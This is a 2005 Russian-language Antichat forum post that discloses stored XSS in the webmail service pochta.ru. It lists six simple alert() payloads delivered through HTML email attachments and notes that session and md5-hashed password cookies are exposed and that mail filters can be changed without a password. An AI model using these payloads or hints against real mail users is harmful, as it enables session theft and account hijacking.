Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   XSS на www.pochta.ru (https://forum.antichat.xyz/showthread.php?t=12124)

kot777 25.12.2005 01:01
XSS на www.pochta.ru
 
Решил я побродить по почтовикам поискать себе почту чтобы мой ник не был занят. И вот в поисках набрел на -www.pochta.ru . Зарегинил себе почту и решил проверить на xss. Нашел пару пассивок, но думаю этого мало и решил посмотреть чё-нибудь активного. Какого же было моё удивление когда я прекрепил html к письму с простейшими xss, и они запустились вот несколько из них:
Цитата:
<iframe src=javascript:alert()>
<image src="" onerror=alert()>
<image src='' onerror=alert()>
<img src="" onerror=alert()>
<img src='' onerror=alert()>
<meta http-equiv=Refresh content=0;url=javascript:alert()>
Когда же я запустил эту же html через IE, сложилось ощущение что почту вообще не защищали. Посмотрел Куки, там только сессия, поставил галку сохранить пароль, в Куках появился md5 криптованный пароль. После дальнейшего изучения нашел что для установки фильтра не нужен пароль. (с)KoT777
_______
статья перемещена из МОА, за ненадобностью.


Время: 09:40